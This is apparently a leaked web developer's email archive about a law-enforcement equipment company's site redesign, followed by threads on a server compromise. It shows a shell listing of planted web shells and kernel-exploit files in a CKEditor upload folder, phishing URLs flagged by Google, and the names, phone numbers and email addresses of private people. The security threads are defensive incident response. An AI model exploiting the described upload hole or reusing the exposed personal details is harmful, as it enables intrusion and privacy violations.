  1286. >>>>> [Paul Ford] That is correct. I see three variations here. You tell me whether or not we can do one or all three.
  1287. >>>>> 1. Distributors & Independant reps can have access to the site to see current prices (agency and distributor prices).
  1288. >>>>> 2. Distributor Special Price Request - Often our distributors are receiving requests for price quotes. We call them RFQs. These can be very informal and most times are, like faxes, emails and just a telephone call. Or they can be formal and published by the agency. Especially if it is a larger opportunity. At any rate, the distributor knows they are in a competitive situation, so they have to offer the best price they can. So what happens then is they call me and ask for better pricing, lower than published distributor price. What I would like is for a distributor to be able to request a special price quote from CSI by designated the items and quantities. They can also give me us information, like:
  1289. >>>>> - What agency is requesting the price
  1290. >>>>> - When is the bid due
  1291. >>>>> - And maybe a message at the bottom of the where they put in any incidental info.
  1292. >>>>> 3. An officer from a Police Agency, should be able to log on to the site, select certain items and name the quantity and receive a "Budgetary Quote." I think we should call it a budgetary quote, because everything will be listed at Agency Price. If they were to call their distributor and get the same quote it would be the distributor's discretion on what price and generally be much lower than this. I don't want to scare an agency off, when they get these quotes. Hence, we stress "Budgetary Quote."
  1293. >>>>>>
  1294. >>>>>> 3. How are the details of the Merchant account coming along? Has a merchant account been established and if so, with which vendor? We will need a username and password for that account in order to set up the API connection code.
  1295. >>>>> I do remember Becky going over this and this has not been done. We are probably going to need a refresher and I am delegating this responsibility to Amber to get done.
  1296. >>>>>>
  1297. >>>>>> 4. The only product images we have are on the existing site. If there are updated images to be used, please direct us to those. Otherwise, we will leave the images out for now and allow you to update those yourselves.
  1298. >>>>> Multiple steps here. Again, I'm delegating to Amber / requesting her assistance. It will take both of us.
  1299. >>>>> 1. Amber figure out a way to get this organized we can take inventory and account for what we have, then save them with logical file names. Like by model numbers. the The 12GA Super Sock should be something like 2581_1.jpg and 2581_2.jpg. There is a column on this spreadsheet to enter the files names of photos.
  1300. >>>>> 2. Amber we need to go through our current inventory of digital files and what is currently on our website and see what we have. I cannot find the reworked images that Steve Jones did for the updated CTS Less Lethal Brochure.
  1301. >>>>> 3. Once we know what we are missing, we'll need a plan to get the photos.
  1302. >>>>>
  1303. >>>>>>
  1304. >>>>>> 5. We would like to go over the Request A Quote feature with you again because our notes on that are pretty old and we had some outstanding questions that we don't think we've come to a conclusion on.
  1305. >>>>> See number two. But I will be available on Thursday and Friday to spend as much time as necessary discussing.
  1306. >>>>>>
  1307. >>>>>> 6. We have listed the products in Categories and Subcategories according to the Excel file you sent, but we will want to go over the categorization with you to make sure we've got everything in the correct place.
  1308. >>>>> Agreed
  1309. >>>>>>
  1310. >>>>>> Let me know if you want to talk about this, I can conference call Becky our programmer in also, whatever you are ready for…
  1311. >>>>> Let's do definitely get together on Thursday or Friday. This is taking more time than we first discussed, but like I said I'm okay with it. I just want to have this done and live before SHOT Show January 16.
  1312. >>>>>> <
  1313.  
  1314.  
  1315. Hi, Paul:
  1316.  
  1317. Sounds good. Sales tax, I definitely want to go over to make sure I'm covering that base properly for you. Not sure about the insurance issue - that may be more internal than website-related, but I look forward to our conversation tomorrow to get everything ironed out and your new site ready on its way to launch.
  1318.  
  1319. ~B
  1320.  
  1321.  
  1322. On 11/09/2011 05:35 AM, Paul Ford wrote:
  1323. > Becca, I'm sharing some of the comments from our VP of finance with you. I think her concerns are a little bit over stated, but I do need to discuss these with you when we talk on Thursday.
  1324. > -- P
  1325. >
  1326. >
  1327. > From: Janet Scott <janetscott@combinedsystems.com>
  1328. > Organization: Combined Systems, Inc.
  1329. > Date: Tue, 8 Nov 2011 15:57:01 -0500
  1330. > To: Richard Edge <RichardEdge@combinedsystems.com>
  1331. > Cc: Paul Ford <paulford@combinedsystems.com>
  1332. > Subject: FW: Merchant Account for new web site
  1333. >
  1334. > Are you aware of this?
  1335. >
  1336. >
  1337. >
  1338. > There are all kinds of issues, sales tax, insurance, etc that need to be discussed before we jump into this.
  1339. >
  1340. >
  1341. >
  1342. > If we do not plan it properly, it will not become my emergency.
  1343. >
  1344. >
  1345. >
  1346. >
  1347. >
  1348. > Janet
  1349. >
  1350. >
  1351. >
  1352. > From: Amberlyn Jones [mailto:ajones@combinedsystems.com]
  1353. > Sent: Tuesday, November 08, 2011 3:13 PM
  1354. > To: 'Janet Scott'
  1355. > Cc: 'Paul Ford'
  1356. > Subject: FW: Merchant Account for new web site
  1357. >
  1358. >
  1359. >
  1360. > Janet,
  1361. >
  1362. >
  1363. >
  1364. > We need to set up an account to be able to process payments online for aerosols & handcuffs. Please read below. Is this something your team should take of care of because of the bank notification?
  1365. >
  1366. >
  1367. >
  1368. > Amberlyn A. Jones
  1369. >
  1370. > Training & Marketing Specialist
  1371. >
  1372. > Combined Systems, Inc.
  1373. >
  1374. > 388 Kinsman Road
  1375. >
  1376. > Jamestown, PA 16134
  1377. >
  1378. > PH: 724-932-2177 Ext. 119
  1379. >
  1380. > FAX: 724-932-2157
  1381. >
  1382. >
  1383. >
  1384. > This e-mail message is for the sole use of the intended recipient(s) and may contain confidential and privileged information. Any unauthorized review, use, disclosure, or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of the original e-mail.
  1385. >
  1386. >
  1387. >
  1388. > From: Rebecca Adamson [mailto:becca.adamson@gmail.com]
  1389. > Sent: Tuesday, November 08, 2011 2:42 PM
  1390. > To: Amberlyn Jones
  1391. > Cc: Paul Davies
  1392. > Subject: Re: Merchant Account for new web site
  1393. >
  1394. >
  1395. >
  1396. > Hi, Amber:
  1397. >
  1398. > I'd recommend Authorize.net or Cybersource (they're actually the same company now, but two slightly different interfaces. They're both good).
  1399. >
  1400. > Start an account with one of them and then let your bank know that you intend to take purchases online (be specific about "online", they might need to have you fill out specific paperwork for that).
  1401. >
  1402. > While the bank is working on their end, Cybersource or Authorize can move forward with setting you up in test mode. They'll give you a username and password to their control panel. Log in to that to finish the set up (just a couple of questions, I think). And then forward the username and password to me and I can get the site connected from there. (You'll be able to change the password after your site goes live, so there won't be any worries about security).
  1403. >
  1404. > http://www.authorize.net/
  1405. >
  1406. > http://www.cybersource.com/
  1407. >
  1408. > As soon as you decide on one, let me know, because I can move forward with that part of the code while we're waiting for the username and password to be issued.
  1409. >
  1410. > Let me know if questions come up. I've not actually been through thispart of the process myself, I only recommend these two because I've worked with them from a code standpoint so much and I am familiar with their control panels.
  1411. >
  1412. > The sooner, the better. I've seen this process takes weeks to get to the point where you get a username and password issued.
  1413. >
  1414. > ~B
  1415.  
  1416.  
  1417.  
  1418. Hi, David:
  1419.  
  1420. It shouldn't be necessary to move to another DNS server, just to update the nameserver records. But, you know more about things on your end, so I'll trust in your way. The IP address is 69.30.233.88
  1421.  
  1422. My understanding is that Paul wants the new site to go live on Tuesday.
  1423.  
  1424. Thanks!
  1425.  
  1426. ~B
  1427.  
  1428. On 01/12/2012 04:22 AM, David Bricca wrote:
  1429. > Hi Rebecca,
  1430. >
  1431. > We just need to know the new IP address of the web server when you are ready to launch the new site. Moving to another DNS server is too much trouble.
  1432. >
  1433. > Regards,
  1434. > David Bricca
  1435. > -----------------------
  1436. > Sent from my iPhone
  1437. >
  1438. > On Jan 10, 2012, at 11:35 AM, "Rebecca Adamson" <becca.adamson@gmail.com> wrote:
  1439. >
  1440. >> Hi, Dave:
  1441. >>
  1442. >> Please let me know if I can do anything to assist. My number is 816.8385.4617.
  1443. >>
  1444. >> Thanks!
  1445. >>
  1446. >> ~Rebecca
  1447. >>
  1448. >> On 01/10/2012 06:06 AM, Paul Ford wrote:
  1449. >>> Happy New Year Dave,
  1450. >>>
  1451. >>> We are in the process and getting close to launching a new website. http://csi.markbranding.com/myaccount/login.php
  1452. >>>
  1453. >>> Rebecca, our web developer at Mark Branding has asked about the DNS settings so that when the time comes, we can take the new site live on their servers pointing to NS1.KROMBIE.NET and NS2.KROMBIE.NET
  1454. >>>
  1455. >>> We don't want to do this just yet, but I would guess by Friday afternoon, we will be there. … I hope.
  1456. >>>
  1457. >>> Can you assist us with this?
  1458. >>>
  1459. >>> All the best, Paul
  1460. >>>
  1461. >>>
  1462. >>>
  1463. >>> On 01/09/2012 12:52 PM, Paul Ford wrote:
  1464. >>>> Okay. Can we set up a test run for
  1465. >>>> -Distributor log in and RFQ
  1466. >>>> -Agency log in and RFQ
  1467. >>>>
  1468. >>>> Answers:
  1469. >>>> 1. Here are my thoughts, but I'll take your advice. I think by having it on every product increases the probability of the agency and the distributor first finding and second using the feature.
  1470. >>>>
  1471. >>>> We should also note that the RFQ feature is for US domestic law enforcement agencies and distributors only. Int'l clients will have to use a different method to obtain quotes.
  1472. >>>>
  1473. >>>> 2. No, but I will put you in direct contact with the guy who does have all the access.
  1474. >>>> 3. Yes this is still correct. Before the end of the week, we'll have to make sure that every product has a price listed.
  1475. >>>> -- P
  1476. >>>>
  1477. >>>>
  1478. >>>> From: Rebecca Adamson <becca.adamson@gmail.com>
  1479. >>>> Date: Fri, 06 Jan 2012 13:47:46 -0600
  1480. >>>> To: Paul Ford <paulford@combinedsystems.com>
  1481. >>>> Cc: Amberlyn Jones <ajones@combinedsystems.com>, Paul Davies <pdavies@markbranding.com>
  1482. >>>> Subject: Questions & Notes
  1483. >>>>
  1484. >>>> Questions:
  1485. >>>>
  1486. >>>> 1. Right now, I have all products that do not have prices listed to display a Request A Quote button. But, do you want clients to be able to Request A Quote on any and all products regardless of price listed?
  1487. >>>>
  1488. >>>> 2. Do you have control of your DNS settings so that when the time comes, we can take the new site live? We'll need to switch the nameservers to point to
  1489. >>>> NS1.KROMBIE.NET and NS2.KROMBIE.NET
  1490. >>> -- P
  1491. >>>
  1492. >>>
  1493. >>> From: Rebecca Adamson <becca.adamson@gmail.com>
  1494. >>> Date: Mon, 09 Jan 2012 13:07:25 -0600
  1495. >>> To: Paul Ford <paulford@combinedsystems.com>
  1496. >>> Cc: Amberlyn Jones <ajones@combinedsystems.com>, Paul Davies <pdavies@markbranding.com>
  1497. >>> Subject: Re: Questions & Notes
  1498. >>>
  1499. >>> Hi, Paul:
  1500. >>>
  1501. >>> Go ahead and create a test account for a Distributor and then one for an Agency. http://csi.markbranding.com/myaccount/login.php
  1502. >>>
  1503. >>> Using those test accounts, you can log in and do a test run of the RFQ's. This will allow you to see the entire process that your clients will go through in creating an account, and so forth - puts you in their shoes, so to speak.
  1504. >>>
  1505. >>> Note: You will need to "approve" the accounts in the admin panel before your created test accounts can log in.
  1506. >>>
  1507. >>> I will put the RFQ button on every product, as you suggested. And, then, I'll add some wording about US-only.
  1508. >>>
  1509. >>> We should get our ducks lined up as soon as we can on changing the DNS. It can sometimes take 24-48 after making the change before it takes effect across the web.
  1510. >>>
  1511. >>> ~B
  1512. >>>
  1513. >>>
  1514. >>>
  1515. >>> On 01/09/2012 12:52 PM, Paul Ford wrote:
  1516. >>>> Okay. Can we set up a test run for
  1517. >>>> -Distributor log in and RFQ
  1518. >>>> -Agency log in and RFQ
  1519. >>>>
  1520. >>>> Answers:
  1521. >>>> 1. Here are my thoughts, but I'll take your advice. I think by having it on every product increases the probability of the agency and the distributor first finding and second using the feature.
  1522. >>>>
  1523. >>>> We should also note that the RFQ feature is for US domestic law enforcement agencies and distributors only. Int'l clients will have to use a different method to obtain quotes.
  1524. >>>>
  1525. >>>> 2. No, but I will put you in direct contact with the guy who does have all the access.
  1526. >>>> 3. Yes this is still correct. Before the end of the week, we'll have to make sure that every product has a price listed.
  1527. >>>> -- P
  1528. >>>>
  1529. >>>>
  1530. >>>> From: Rebecca Adamson <becca.adamson@gmail.com>
  1531. >>>> Date: Fri, 06 Jan 2012 13:47:46 -0600
  1532. >>>> To: Paul Ford <paulford@combinedsystems.com>
  1533. >>>> Cc: Amberlyn Jones <ajones@combinedsystems.com>, Paul Davies <pdavies@markbranding.com>
  1534. >>>> Subject: Questions & Notes
  1535. >>>>
  1536. >>>> Questions:
  1537. >>>>
  1538. >>>> 1. Right now, I have all products that do not have prices listed to display a Request A Quote button. But, do you want clients to be able to Request A Quote on any and all products regardless of price listed?
  1539. >>>>
  1540. >>>> 2. Do you have control of your DNS settings so that when the time comes, we can take the new site live? We'll need to switch the nameservers to point to
  1541. >>>> NS1.KROMBIE.NET and NS2.KROMBIE.NET
  1542. >>>>
  1543. >>>> 3. My notes tell me that you want real-time price calculating for the Budgetary Quote. But not for Request a Quote (for Distributors), is this still correct? Some of the products do not have prices yet, so I just want to make sure that's still the plan.
  1544.  
  1545. Subject Fwd: CSI New Project: Website Redesign
  1546. Sender Paul Davies Add contact
  1547. Recipient Peter DeMarco Add contact
  1548. Date 11.02.2011 16:23
  1549.  
  1550. Website Redesign_021111.doc
  1551.  
  1552. Peter,
  1553.  
  1554. I just got this, this morning. Are you interested? It may sound bigger than what it is, but... video, shopping cart, admin... kinda borderline between you and Scotty, right? But i have not sent this to Scotty yet, unless you pass on it.
  1555.  
  1556. Paul
  1557.  
  1558.  
  1559. Paul
  1560. Paul Davies
  1561. President, MARK Corporate Branding
  1562.  
  1563. 104 East 5th Street, Suite 200 I Kansas City, MO 64106 I c] 816.520.1791 I p] 816.256.3477 I f] 800.260.4069 I pdavies@MARKbranding.com I www.MARKbranding.com
  1564.  
  1565. P.S. Please don't keep us a secret! Your referrals are the lifeblood of our business. If you know someone who would appreciate the high level of service we provide, please call us immediately, and we will be happy to follow up! Thank you.
  1566.  
  1567.  
  1568. Begin forwarded message:
  1569.  
  1570. From: "Paul Ford" <paulford@combinedsystems.com>
  1571. Date: February 11, 2011 9:55:45 AM CST
  1572. To: "'Paul Davies'" <pdavies@markbranding.com>
  1573. Subject: CSI New Project: Website Redesign
  1574.  
  1575. Paul ,
  1576.  
  1577. I went over my plans for the website this week with Richard Edge. He thinks the site we have is okay and that we just need to include the new handcuff site. However, after pushing the benefits of a new site, he is open to a complete redo if I can justify it. So, I’m putting together a one-pager for him this week describing how a new site would be better and how in the long run it would make better financial sense – either by saving us money or making us money. For this project, I have to get three quotes, but that doesn’t necessarily mean I have to go with cheapest, rather the best value for the money.
  1578.  
  1579. For the complete redo, there are several things I need and I have included this in the creative brief. Here’s a couple I just want to stress:
  1580.  
  1581. 1. E-commerce (shopping cart) capability for handcuffs and pepper spray and maybe some accessories and apparel. Also, please include any recurring monthly costs on for shopping cart capability and if you know any cost per transaction.
  1582. 2. Better organization and access to the product specification sheets. I think what we have now is terrible.
  1583. 3. The final product should incorporate all these sites in a logical architecture:
  1584. a. www.combinedsystems.com --- that’s the main gateway to the companies sites that presents the product lines as the CSI family of companies or brands. I’ve include some examples of sites in the creative brief. I think the Taser and Defense Technology sites are most impressive and look the most professional. I actually think we could adopt something similar organizational format. I also think it makes sense to organize our sites the same way our brochures are organized.
  1585. i. www.less-lethal.com -- CTS Less Lethal product line
  1586. ii. www.pennarms.com -- Penn Arms Launchers
  1587. iii. www.handcuffsusa.com --
  1588. 4. We are interested in including videos, either initially or priced out as an option that we can add on later if decide not to include at first.
  1589. 5. Also would be interested in something dynamic or different. Like something that is always changing, like a newsfeed or perhaps an instant messaging system where during business hours you can talk to a customer service rep live.
  1590. 6. Last thing, the recurring monthly costs on our website are too much. We want to be able to give a couple of our employees a little bit of training and make minor changes to the website ourselves. Examples of changes would be: training calendar updates, change out a photo, make small corrections to paragraph’s content. I think we should also note the things that still will require maintenance on a monthly or quarterly basis and what those costs are estimated to be.
  1591.  
  1592. If all goes well I would like to get this project approved soon and be ready to begin the project sometime in late February or March.
  1593.  
  1594. If the approval for the complete redo is not successful at the bare minimum, I will be redesigning thewww.handcuffsusa.com site.
  1595.  
  1596. Regards, Paul
  1597.  
  1598.  
  1599.  
  1600.  
  1601. Subject Re: FW: Phishing notification regarding cbts.edu
  1602. Sender Peter DeMarco Add contact
  1603. Recipient Francisco Litardo Add contact
  1604. Copy becca.adamson@gmail.com Add contact, Paul Davies Add contact, John Gravley Add contact
  1605. Date Sat 00:57
  1606. It looks like the vulnerability came in through another site. I'm locking down the initial entry point and sweeping the system. We'll be looking to into it more over the weekend.
  1607.  
  1608. - Peter
  1609.  
  1610.  
  1611. On 2/10/2012 6:47 PM, Francisco Litardo wrote:
  1612.  
  1613. Thanks. Please keep us posted. We are traveling through Asia and are accessing wifi at times. Let us know if that has anything to do with it.
  1614.  
  1615. Francisco
  1616. From: Peter DeMarco [peter@tensquirrel.com]
  1617. Sent: Friday, February 10, 2012 6:39 PM
  1618. To: Francisco Litardo
  1619. Cc: becca.adamson@gmail.com; becky@tensquirrel.com; Paul Davies; John Gravley
  1620. Subject: Re: FW: Phishing notification regarding cbts.edu
  1621.  
  1622. Francisco,
  1623.  
  1624. I've eliminated these and am looking into how they got there.
  1625.  
  1626. - Peter
  1627.  
  1628.  
  1629. On 2/10/2012 5:50 PM, Francisco Litardo wrote:
  1630.  
  1631. Hello everyone - I am traveling in Myanmar and Thailand but I am passing this along for you to respond to as soon as possible. Take a look at the e-mails below. Especially our IT vendor's e-mail about you having been Hacked.
  1632.  
  1633. Can you verify this and keep us updated. Please make sure to reply to all so that John Gravley is aware of th e developments. I won't always have access to e-mail.
  1634.  
  1635. Francisco
  1636. From: Steve Guinn
  1637. Sent: Friday, February 10, 2012 2:06 PM
  1638. To: John Gravley; Francisco Litardo
  1639. Cc: Jon Miller
  1640. Subject: FW: Phishing notification regarding cbts.edu
  1641.  
  1642. For immediate attention. Please see message below from Google about suspicious URLs on our website. This is likely something our web hosting service will need to address/investigate/etc.
  1643.  
  1644.  
  1645.  
  1646. Steve Guinn
  1647.  
  1648. Assistant to the Dean
  1649.  
  1650. 913-667-5700 ext. 107
  1651.  
  1652.  
  1653.  
  1654. From: Jon Miller [mailto:jmiller@integritykc.com]
  1655. Sent: Friday, February 10, 2012 2:02 PM
  1656. To: Steve Guinn
  1657. Subject: FW: Phishing notification regarding cbts.edu
  1658.  
  1659.  
  1660.  
  1661. Hi Steve,
  1662.  
  1663.  
  1664.  
  1665. Looks like our web hosts got hacked. They need to get this fixed as soon as possible.
  1666.  
  1667.  
  1668.  
  1669. Description: cid:image001.jpg@01CC9EE8.B53C7020
  1670.  
  1671. Email Support:
  1672.  
  1673.  
  1674. help@integritykc.com
  1675.  
  1676. Live Chat:
  1677.  
  1678.  
  1679. www.integritykc.com
  1680.  
  1681. Emergency Line:
  1682.  
  1683.  
  1684. 913-324-8404 x1
  1685.  
  1686.  
  1687.  
  1688.  
  1689.  
  1690. From: noreply@google.com [mailto:noreply@google.com]
  1691. Sent: Friday, February 10, 2012 12:05 PM
  1692. To: abuse@cbts.edu; admin@cbts.edu; administrator@cbts.edu; contact@cbts.edu; info@cbts.edu; postmaster@cbts.edu; support@cbts.edu; webmaster@cbts.edu
  1693. Subject: Phishing notification regarding cbts.edu
  1694.  
  1695.  
  1696.  
  1697. Dear site owner or webmaster of cbts.edu,
  1698.  
  1699. We recently discovered that some pages on your site look like a possible phishing attack, in which users are encouraged to give up sensitive information such as login credentials or banking information. We have removed the suspicious URLs from Google.com search results and have begun showing a warning page to users who visit these URLs in certain browsers that receive anti-phishing data from Google.
  1700.  
  1701. Below are one or more example URLs on your site which may be part of a phishing attack:
  1702.  
  1703. http://www.cbts .edu/Paypal.com/webscr/
  1704. http://www.cbts .edu/Paypal.com/webscr/update.php
  1705.  
  1706. Here is a link to a sample warning page:
  1707. http://www.google.com/interstitial?url=http%3A//www.cbts.edu/Paypal.com/webscr/
  1708.  
  1709. We strongly encourage you to investigate this immediately to protect users who are being directed to a suspected phishing attack being hosted on your web site. Although some sites intentionally host such attacks, in many cases the webmaster is unaware because:
  1710.  
  1711. 1) the site was compromised
  1712. 2) the site doesn't monitor for malicious user-contributed content
  1713.  
  1714. If your site was compromised, it's important to not only remove the content involved in the phishing attack, but to also identify and fix the vulnerability that enabled such content to be placed on your site. We suggest contacting your hosting provider if you are unsure of how to proceed.
  1715.  
  1716. Once you've secured your site, and removed the content involved in the suspected phishing attack, or if you believe we have made an error and this is not actually a phishing attack, you can request that the warning be removed by visiting
  1717. http://www.google.com/safebrowsing/report_error/?tpl=emailer
  1718. and reporting an "incorrect forgery alert." We will review this request and take the appropriate actions.
  1719.  
  1720. Sincerely,
  1721. Google Search Quality Team
  1722.  
  1723. Note: if you have an account in Google's Webmaster Tools, you can verify the authenticity of this message by logging into https://www.google.com/webmasters/tools/siteoverview and going to the Message Center, where a warning will appear shortly.
  1724.  
  1725.  
  1726.  
  1727. --
  1728. Peter DeMarco
  1729. Ten Squirrel, LLC
  1730. 816.878.3624
  1731.  
  1732.  
  1733.  
  1734. --
  1735. Peter DeMarco
  1736. Ten Squirrel, LLC
  1737. 816.878.3624
  1738.  
  1739.  
  1740.  
  1741.  
  1742.  
  1743. Subject Re: CSI uploads
  1744. Sender Peter DeMarco Add contact
  1745. Recipient Rebecca Adamson Add contact, webguy@markbranding.com Add contact, jeremy@geeo.net Add contact
  1746. Date Sat 00:44
  1747. Copying Jeremy on this as well. This may explain that kernel panic the other day. Going to start looking around.
  1748.  
  1749. yinrunning vhosts # cd /var/www/vhosts/www.combinedsystems.com/docroot/cc/ckeditor/filemanager/userfiles/
  1750. yinrunning userfiles # ls
  1751. 10 12 14 16 18 2.6 5 7 9 cpanel.php inboxnchallah.php user.php
  1752. 11 13 15 17 19 4 6 8 cheddar_bay fleurshi-.-.php indexa.php user1.php
  1753. yinrunning userfiles # ls cheddar_bay/
  1754. cheddar_bay.sh exploit exploit.c pwnkernel pwnkernel.c
  1755.  
  1756. Those are obviously exploitative. I'm going to kill the entire directory for the moment.
  1757.  
  1758. - Peter
  1759.  
  1760.  
  1761. On 2/10/2012 6:37 PM, Peter DeMarco wrote:
  1762.  
  1763. Does CSI have any file uploads as part of their site? I've got an intrusive script on the server and it looks like it originated in their ckeditor directories.
  1764.  
  1765. --
  1766. Peter DeMarco
  1767. Ten Squirrel, LLC
  1768. 816.878.3624
  1769.  
  1770.  
  1771.  
  1772. --
  1773. Peter DeMarco
  1774. Ten Squirrel, LLC
  1775. 816.878.3624
  1776.  
  1777.  
  1778.  
  1779.  
  1780.  
  1781. From: Ron Daniel <ron@fireflymkt.com>
  1782. Subject: Fwd: A couple sites found hacked on your fireflymkt.com vps
  1783. To: You <becky@fireflymkt.com>
  1784. Date: 2/12/12 7:13 PM
  1785.  
  1786. ------
  1787.  
  1788. Becky thought you needed to know this.
  1789.  
  1790. Sent from my iPad
  1791.  
  1792. Begin forwarded message:
  1793.  
  1794. > From: David Lowe <dlowe@hardhathosting.com>
  1795. > Date: February 12, 2012 4:11:49 PM CST
  1796. > To: Ron Daniel <ron@fireflymkt.com>
  1797. > Subject: A couple sites found hacked on your fireflymkt.com vps
  1798. >
  1799. > Hi Ron,
  1800. >
  1801. > I found a couple of your sites hacked on your first vps fireflymkt.com. I noticed when your site was using a lot of bandwidth.
  1802. >
  1803. > It looks like the file upload editor part of these sites are vulnerable they uploaded files and were attacking people.
  1804. >
  1805. > I found 3 sites below hacked and a few others that use the same software not sure if it is the software that it was built on or just ckeditor part or filemanager module in ckeditor.
  1806. >
  1807. > I removed the ckeditor part on these sites and scanned all your sites on both vps for malware installed.
  1808. >
  1809. > I removed the uploaded files and moved the ckeditor part to where it says below. I also disabled root direct login via ssh if you login as a user then su root and the password you can get to root.
  1810. >
  1811. > If you want talk about it give us a call tomorrow and we can discuss.
  1812. >
  1813. >
  1814. > Best Regards,
  1815. >
  1816. > David
  1817. >
  1818. >
  1819. > arialliance.org
  1820. > /var/www/vhosts/arialliance.org/httpdocs/cc/ckeditor/filemanager/userfiles/
  1821. >
  1822. > /cc moved to:
  1823. > /root/arialliance.org/ckeditor
  1824. >
  1825. > precisionmfg.com
  1826. > /var/www/vhosts/precisionmfg.com/httpdocs/cc/ckeditor/filemanager/userfiles/
  1827. >
  1828. > /cc moved to:
  1829. > /root/precisionmfg.com/ckeditor
  1830. >
  1831. > gotoacs.com
  1832. > /var/www/vhosts/gotoacs.com/httpdocs/cc/ckeditor/filemanager/userfiles/
  1833. >
  1834. > /cc moved to:
  1835. > /root/gotoacs.com/ckeditor
  1836. >
  1837. > You will need to login as a user the su root -
  1838. > Do to security concerns direct login as root user has been disabled.
  1839. >
  1840. >
  1841. > Other sites with same software and directory structure but not presently hacked not sure if newer or not.
  1842. >
  1843. >
  1844. > billsoft.com
  1845. > m.moumethodist.org
  1846. > m.whatsnextkc.org
  1847. > rkgroupdesignbuild.com
  1848. > tripleloophousewares-dev.com